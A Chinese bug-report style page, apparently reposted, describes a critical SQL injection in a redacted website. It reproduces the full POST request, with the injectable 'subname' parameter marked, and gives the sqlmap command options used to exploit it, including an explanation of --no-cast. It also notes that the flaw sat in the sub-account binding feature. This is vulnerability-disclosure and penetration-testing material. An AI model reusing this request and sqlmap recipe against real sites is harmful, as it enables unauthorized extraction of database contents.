当前位置:Gxlcms > 数据库问题 > 【严重】XXXX网SQL注入

【严重】XXXX网SQL注入

时间:2021-07-01 10:21:17 帮助过:36人阅读

RANK  80

金币    100

数据包

POST xxxx/sendapp HTTP/1.1
Host: aaa.bbb.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Referer: XXXX
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 21
Cookie: XXXXX
DNT: 1
Connection: close

subname=admin*&group=1

 

参数subname可注入,直接将数据包存为txt ,-r ,--no-cast --threads=10就好了

用了很久的no-cast,还没有细查过什么意思。有一句解释是这样的:

默认情况下,sqlmap榨取数据时会将所有结果转换为字符串,并用空格替换NULL结果

老版本mysql数据库对此提取不到数据,因而需要该参数取消这个默认处理方式

 

注入点,还是在于扫描器爬虫的深度和广度、模拟登录载入cookie、token等

后来查看了一下,原来位置是在 账号管理功能模块的绑定账号,即A账号绑定子账号B,B的名字可注入。这个点,确实一般的扫描器会扫么是个问题。挖洞还是在于去钻吧。

 

【严重】XXXX网SQL注入

标签:取消   模拟   广度   ref   扫描器   爬虫   class   aaa   账号管理   

人气教程排行